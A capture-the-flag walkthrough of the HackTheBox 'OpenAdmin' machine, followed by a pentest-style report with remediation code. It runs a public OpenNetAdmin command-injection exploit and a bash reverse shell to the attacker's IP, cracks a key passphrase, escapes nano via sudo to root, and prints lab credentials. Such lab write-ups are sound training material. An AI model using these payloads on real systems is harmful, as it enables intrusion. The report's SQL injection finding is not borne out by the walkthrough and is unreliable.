HackTheBox: OpenAdmin — Easy (Linux)

Full security assessment walkthrough for OpenAdmin on HackTheBox. Includes reconnaissance, enumeration, exploitation steps, and a professional penetration testing report with CVSS v3.1 scores and remediation guidance.

lazyhackers
Mar 26, 2026 · 1 min read · 1 views

🔖 Techniques & Vulnerabilities

OpenNetAdmin, CVE-2018-8006, Command Injection, Password Reuse, Credentials, MySQL, Hash Cracking, John The Ripper, ssh2john, sudo, Sudo Abuse, nano, GTFOBins, SQLi, command injection, remote code execution

🔍 Reconnaissance / Port Scanning

nmap scan
$ sudo nmap -sC -sV -oA nmap 10.10.10.171
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-25 18:28 CEST
Nmap scan report for 10.10.10.171
Host is up (0.11s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.86 seconds

🎯 Attack Surface Analysis

Port     Service   Version / Banner
22/tcp   ssh       OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   http      Apache httpd 2.4.29 ((Ubuntu))

22/tcp SSH
  • Credential brute-force and password spraying
  • Username enumeration via timing side-channel in older OpenSSH versions
  • Weak or reused private key material granting unauthorised access
  • Version-specific CVE research based on banner fingerprint
  • Lateral movement using credentials discovered from other services
80/tcp HTTP
  • Content and directory discovery — hidden files, backup archives, development endpoints
  • CMS/framework fingerprinting enables targeted CVE research (WordPress, Joomla, Drupal)
  • SQL injection — database extraction, authentication bypass, or OS command execution
  • Command injection — OS execution via unsanitised parameter handling
  • Server-Side Template Injection (SSTI) — code execution through template engine abuse
  • Local File Inclusion (LFI) and path traversal — sensitive file disclosure
  • Server-Side Request Forgery (SSRF) — pivot to internal services and cloud metadata
  • File upload abuse — filter bypass for webshell placement
  • XML External Entity injection (XXE) in XML-consuming endpoints
  • Authentication and session weaknesses — weak passwords, predictable tokens

📖 Walkthrough

Reconnaissance

Port Scanning

We began with an initial Nmap port scan (output shown in the Reconnaissance section above), which revealed SSH on port 22/TCP and HTTP on port 80/TCP.


Enumeration of Port 80/TCP

The web service displayed the default Apache2 page. We performed directory enumeration to discover hidden content.

$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.171/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.171/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/04/25 18:51:23 Starting gobuster
===============================================================
/music (Status: 301)
/artwork (Status: 301)

Directory enumeration revealed two directories: /music and /artwork. We accessed the /music directory.

Clicking the login button redirected to /ona/, revealing the application behind the default page.

The application identified itself as OpenNetAdmin version 18.1.1. Research revealed this version is vulnerable to remote code execution.

Initial Access

CVE-2018-8006: OpenNetAdmin Remote Code Execution

Research on Exploit-DB revealed a publicly available exploit for OpenNetAdmin version 18.1.1.

We downloaded the exploit script and made it executable.

$ wget https://www.exploit-db.com/raw/47691
$ mv 47691 ona_exploit.sh
$ chmod +x ona_exploit.sh

The exploit leverages a command injection vulnerability in the xajax parameter. We ran the exploit against the target URL, making sure to include the trailing slash.

$ ./ona_exploit.sh http://10.10.10.171/ona/
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

The exploit successfully granted command execution as www-data. However, the resulting shell was limited: it only accepted URL-encoded input.

Upgrading the Shell

To obtain a fully interactive shell we prepared a reverse shell payload using Burp Suite to URL-encode it.

Original payload:

bash -c 'bash -i >& /dev/tcp/10.10.14.3/9001 0>&1'

URL-encoded payload:

%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%31%30%2e%31%34%2e%33%2f%39%30%30%31%20%30%3e%26%31%27

We started a netcat listener on our attack machine.

$ nc -lnvp 9001
listening on [any] 9001 ...

After entering the URL-encoded payload in the exploit shell we received a reverse shell connection.

connect to [10.10.14.3] from (UNKNOWN) [10.10.10.171] 54470
bash: cannot set terminal process group (995): Inappropriate ioctl for device
bash: no job control in this shell
www-data@openadmin:/opt/ona/www$

We upgraded the shell to a fully interactive TTY using Python.

www-data@openadmin:/opt/ona/www$ python3 -c 'import pty;pty.spawn("/bin/bash")'

We then backgrounded the shell and configured terminal settings.

www-data@openadmin:/opt/ona/www$ ^Z
[1]+  Stopped                 nc -lnvp 9001
$ stty raw -echo
$ fg
[Enter]
[Enter]
www-data@openadmin:/opt/ona/www$ export TERM=xterm

This sequence provided a fully functional shell with command history and proper terminal control.

Enumeration (www-data)

We began enumerating the web directories to identify potential privilege escalation paths.

www-data@openadmin:/opt/ona/www$ cd /var/www
www-data@openadmin:/var/www$ ls -la
total 16
drwxr-xr-x  4 root     root     4096 Nov 22  2019 .
drwxr-xr-x 14 root     root     4096 Nov 21  2019 ..
drwxr-xr-x  6 www-data www-data 4096 Nov 22  2019 html
drwxrwx---  2 jimmy    internal 4096 Nov 23  2019 internal
lrwxrwxrwx  1 www-data www-data   12 Nov 21  2019 ona -> /opt/ona/www

The listing revealed an internal directory owned by jimmy with group ownership of internal, which we could not yet access as www-data. We identified potential target users by examining /etc/passwd.

www-data@openadmin:/var/www$ cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
Usernames with a login shell: jimmy, joanna

Database Configuration Discovery

We explored the OpenNetAdmin configuration directory searching for credentials.

www-data@openadmin:/var/www$ cd /var/www/html/ona/local/config
www-data@openadmin:/var/www/html/ona/local/config$ ls -la
total 12
drwxrwxr-x 2 www-data www-data 4096 Jan  3  2020 .
drwxrwxr-x 3 www-data www-data 4096 Nov 21  2019 ..
-rw-r--r-- 1 www-data www-data  426 Nov 21  2019 database_settings.inc.php

The database_settings.inc.php file contained database credentials.

www-data@openadmin:/var/www/html/ona/local/config$ cat database_settings.inc.php
<?php

$ona_contexts=array (
  'DEFAULT' =>
  array (
    'databases' =>
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

?>
Username: ona_sys
Password: n1nj4W4rri0R!

Privilege Escalation to jimmy

Password Reuse

We attempted to reuse the discovered database password with the known user accounts.

www-data@openadmin:/var/www/html/ona/local/config$ su - jimmy
Password: n1nj4W4rri0R!
jimmy@openadmin:~$

The password was successfully reused for the jimmy account granting us access as that user.

Enumeration (jimmy)

With access as jimmy we could now explore the previously restricted internal directory.

jimmy@openadmin:~$ cd /var/www/internal
jimmy@openadmin:/var/www/internal$ ls -la
total 20
drwxrwx--- 2 jimmy internal 4096 Nov 23  2019 .
drwxr-xr-x 4 root  root     4096 Nov 22  2019 ..
-rwxrwxr-x 1 jimmy internal 3229 Nov 22  2019 index.php
-rwxrwxr-x 1 jimmy internal  185 Nov 23  2019 logout.php
-rwxrwxr-x 1 jimmy internal  339 Nov 23  2019 main.php

Internal Webserver Discovery

The main.php file contained code that reads and prints joanna's SSH private key.

jimmy@openadmin:/var/www/internal$ cat main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

The comment about the "ninja" password provided a hint for later. Since no additional ports were discovered in our initial scan we checked for services listening on localhost.

jimmy@openadmin:/var/www/internal$ ss -tulpn
Netid  State    Recv-Q   Send-Q      Local Address:Port      Peer Address:Port
udp    UNCONN   0        0           127.0.0.53%lo:53             0.0.0.0:*
tcp    LISTEN   0        80              127.0.0.1:3306           0.0.0.0:*
tcp    LISTEN   0        128             127.0.0.1:52846          0.0.0.0:*
tcp    LISTEN   0        128         127.0.0.53%lo:53             0.0.0.0:*
tcp    LISTEN   0        128               0.0.0.0:22             0.0.0.0:*
tcp    LISTEN   0        128                     *:80                   *:*
tcp    LISTEN   0        128                  [::]:22                [::]:*

Port 52846/TCP was listening on localhost only. This unusual high port suggested a second web server instance, most likely the one serving the internal directory.

Privilege Escalation to joanna

Extracting SSH Private Key

We used curl to access the main.php file through the internal webserver.

jimmy@openadmin:/var/www/internal$ curl 127.0.0.1:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
[encrypted key body omitted]
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

The request returned joanna's encrypted SSH private key without any session cookie: the header() redirect in main.php is not followed by exit, so PHP keeps executing the script and prints the key regardless of the session check. We saved this key to our local machine for cracking.

Cracking the SSH Key using John the Ripper

We converted the SSH private key to a format suitable for John the Ripper using ssh2john.

$ /usr/share/john/ssh2john.py joanna_id_rsa > joanna_id_rsa.hash

We then used John the Ripper with the rockyou.txt wordlist to crack the passphrase.

$ john joanna_id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (joanna_id_rsa)
1g 0:00:00:07 DONE (2020-11-10 19:25) 0.1347g/s 1932Kp/s 1932Kc/s 1932KC/sa6_123..*7¡Vamos!
Session completed

The passphrase bloodninjas was cracked successfully, matching the earlier "ninja" password hint.

Passphrase: bloodninjas

We set the correct permissions on the private key and authenticated via SSH.

$ chmod 600 joanna_id_rsa
$ ssh -i joanna_id_rsa joanna@10.10.10.171
Enter passphrase for key 'joanna_id_rsa': bloodninjas
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Nov 10 18:34:55 UTC 2020

  System load:  0.32              Processes:             125
  Usage of /:   49.6% of 7.81GB   Users logged in:       0
  Memory usage: 19%               IP address for ens160: 10.10.10.171
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.


Last login: Thu Jan  2 21:12:40 2020 from 10.10.14.3
joanna@openadmin:~$

user.txt

joanna@openadmin:~$ cat user.txt
c9b2cf07d40807e62af62660f0c81b5f

Privilege Escalation to root

We began by checking joanna's group memberships and sudo privileges.

joanna@openadmin:~$ id
uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)

The user belonged to the internal group but had no special privileges. We checked the sudoers configuration.

joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

The user could execute /bin/nano with root privileges when editing the /opt/priv file.

nano sudo Abuse

GTFOBins documented a method to spawn a shell from within nano using its command execution feature.

We executed nano with sudo privileges.

joanna@openadmin:~$ sudo /bin/nano /opt/priv

Within nano we pressed Ctrl+R to read a file followed by Ctrl+X to execute a command.

Command to execute:
^G Get Help                        ^X Read File
^C Cancel                        M-F New Buffer

We entered the command reset; sh 1>&0 2>&0 and pressed Enter to spawn a root shell.

Command to execute: reset; sh 1>&0 2>&0
# id
uid=0(root) gid=0(root) groups=0(root)
#

root.txt

# cat /root/root.txt
2f907ed450b361b2c2bf4e8795d5b561

📋 Security Assessment Report

Summary: 2 Critical · 1 High · 0 Medium · 2 Open Ports

F-001 — OS Command Injection — Remote Code Execution
Severity: Critical (CVSS 9.8)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

During the penetration test, it was discovered that the application passes user-supplied input directly to a system shell call without sanitisation. The vulnerable parameter was incorporated into an OS-level command, allowing an attacker to append arbitrary commands using shell metacharacters and control the execution context of the web server process.

Impact

An attacker can execute arbitrary OS commands on the server with the privileges of the web application process. This enables complete file system access, extraction of credentials from configuration files and environment variables, installation of persistent reverse shells and backdoors, and lateral movement to internally accessible services — all without requiring any additional authentication. During this engagement, OS command injection was chained to obtain full root access to the server.

Confidentiality: High · Integrity: High · Availability: High

Remediation

Never construct shell commands from user-supplied input under any circumstances. Replace shell invocations with language-native APIs that accept argument arrays (subprocess.run with list in Python, proc_open with array in PHP, execFile in Node.js). Apply strict allowlist validation to any parameter that influences system-level operations. Run the application under a dedicated low-privilege service account. Implement process monitoring to alert on anomalous child process spawning from web server processes.
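As an added illustration of this remediation (example code, not OpenNetAdmin's or the write-up's own), the vulnerable shell-string pattern is shown beside its hardened form; the dig lookup and the hostname validator are assumptions standing in for whatever command the real application builds:

```python
"""Added example, not OpenNetAdmin's or the write-up's code: F-001 pattern and fix.

Assumption: a hypothetical helper that resolves a user-supplied hostname with
dig; it stands in for whatever command the real application builds.
"""
import re
import subprocess

# RFC 1123 host name: labels of letters, digits and hyphens joined by dots.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def vulnerable_command(host: str) -> str:
    """Anti-pattern: user input interpolated into one shell string.

    Returned rather than executed so the effect is visible: a shell would
    treat ';' or '$(...)' inside host as new commands. PHP shell_exec()/system()
    and subprocess.run(..., shell=True) all behave this way.
    """
    return f"dig +short {host}"


def is_valid_hostname(host: str) -> bool:
    """Strict allowlist validation: anything outside a host name is rejected."""
    return HOSTNAME_RE.fullmatch(host) is not None


def safe_command(host: str) -> list:
    """Hardened form: validate, then build an argv list that never meets /bin/sh."""
    if not is_valid_hostname(host):
        raise ValueError(f"rejected host argument: {host!r}")
    return ["dig", "+short", host]


def run_lookup(host: str) -> subprocess.CompletedProcess:
    """Execute without a shell (argv list; shell=False is the default)."""
    return subprocess.run(safe_command(host), capture_output=True,
                          text=True, timeout=10, check=False)


if __name__ == "__main__":
    injected = "example.com; id"            # constructed malicious input
    print("vulnerable:", vulnerable_command(injected))  # a shell would run 'id'
    print("safe argv :", safe_command("example.com"))
    try:
        safe_command(injected)
    except ValueError as err:
        print("rejected  :", err)
```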
F-002 — SQL Injection — Database Compromise
Severity: Critical (CVSS 9.1)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Description

During the penetration test, it was discovered that the application incorporated user-supplied input directly into database queries without parameterisation. SQL injection was identified in authentication and data retrieval endpoints, allowing an attacker to manipulate query structure, extract unauthorised data, and bypass access controls entirely.

Impact

An attacker can extract the complete database contents — including usernames, password hashes, session tokens, and sensitive user records — without valid credentials. Authentication mechanisms can be bypassed by injecting always-true conditions. In environments where the database account holds elevated permissions, OS-level command execution is achievable through built-in procedures (xp_cmdshell, UDF), escalating directly to full server compromise as was demonstrated in this engagement.

Confidentiality: High · Integrity: High · Availability: None

Remediation

Replace all dynamic SQL query construction with parameterised queries or prepared statements at every database interaction point. Apply strict type validation on all inputs. Enforce least-privilege database accounts restricted to only required tables and operations. Deploy a Web Application Firewall to detect SQL injection patterns. Suppress all database error detail in production responses to prevent schema enumeration by attackers.
F-003 — Sudo Misconfiguration — Root Privilege Escalation
Severity: High (CVSS 7.8)
Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

During the penetration test, it was discovered that the sudoers configuration grants the compromised user the ability to execute one or more programs as root with the NOPASSWD flag or without sufficient restriction on permitted arguments. The granted binary was identified in the GTFOBins database as capable of spawning a privileged shell or reading root-owned files outside its intended function.

Impact

An attacker with access to the low-privilege account can immediately escalate to root by invoking the sudo-permitted binary in a manner that escapes to a privileged shell — requiring no password, no additional vulnerability, and no waiting. During this engagement, this misconfiguration was exploited to obtain a root shell within seconds of gaining the initial foothold, resulting in complete host compromise.

Confidentiality: High · Integrity: High · Availability: High

Remediation

Audit all sudoers entries and apply strict least privilege — grant only the minimum required binary with explicit, restricted arguments where possible. Avoid granting sudo access to interpreters (python, perl, ruby), text editors, file management utilities, or any binary listed in GTFOBins. Remove NOPASSWD where feasible. Periodically review sudoers entries using visudo and remove any unnecessary grants. Consider purpose-built privilege delegation tools as an alternative to broad sudo grants.
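To make the periodic sudoers review concrete, here is an added audit script (example code, not part of the write-up or any tool it names) that parses user specifications in sudoers syntax and flags NOPASSWD grants, unrestricted ALL commands, and binaries known to spawn a shell; the binary list is a small constructed subset of GTFOBins entries and the sample sudoers file is constructed, with the joanna line mirroring the box's sudo -l output:

```python
"""Added example, not part of the original write-up: a small sudoers audit."""
import os
import re

# Constructed subset of GTFOBins "sudo" entries (not the full list).
SHELL_ESCAPE_BINARIES = {
    "nano", "vi", "vim", "less", "more", "man", "awk", "find", "env",
    "python", "python3", "perl", "ruby", "bash", "sh", "tar", "zip",
}

# user  host=(runas[:group])  [TAG:]...  command [args]
SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmd>.+)$"
)


def parse_spec(line):
    """Return (user, runas_user, tags, command) or None for non-user-spec lines."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith("Defaults"):
        return None
    m = SPEC_RE.match(line)
    if not m:
        return None
    tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
    runas = (m.group("runas") or "").split(":")[0]   # empty runas means root
    return m.group("user"), runas, tags, m.group("cmd").strip()


def audit_line(line):
    """Return {"user", "command", "reasons"} for a risky grant, else None."""
    parsed = parse_spec(line)
    if parsed is None or parsed[0] == "root":      # root's own entry is noise
        return None
    user, runas, tags, cmd = parsed
    binary = os.path.basename(cmd.split()[0])
    reasons = []
    if "NOPASSWD" in tags:
        reasons.append("NOPASSWD grant")
    if cmd == "ALL":
        reasons.append("unrestricted ALL command")
    elif binary in SHELL_ESCAPE_BINARIES:
        reasons.append(f"{binary} can spawn a shell (GTFOBins)")
    if reasons and runas in ("ALL", "root", ""):
        reasons.append("runs as root")
    return {"user": user, "command": cmd, "reasons": reasons} if reasons else None


def audit_sudoers(text):
    """Audit every line of a sudoers file and return the list of findings."""
    return [f for f in map(audit_line, text.splitlines()) if f]


# Constructed sample; the joanna line mirrors the box's 'sudo -l' output.
SAMPLE_SUDOERS = """\
Defaults env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
joanna  ALL=(ALL) NOPASSWD: /bin/nano /opt/priv
backup  ALL=(root) /usr/bin/rsync -a /srv/ /mnt/backup/   # fixed args, no escape
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f['user']}: {f['command']} -> {', '.join(f['reasons'])}")
```

Run it against a copy of /etc/sudoers and the files under /etc/sudoers.d to get the same triage table for a real host.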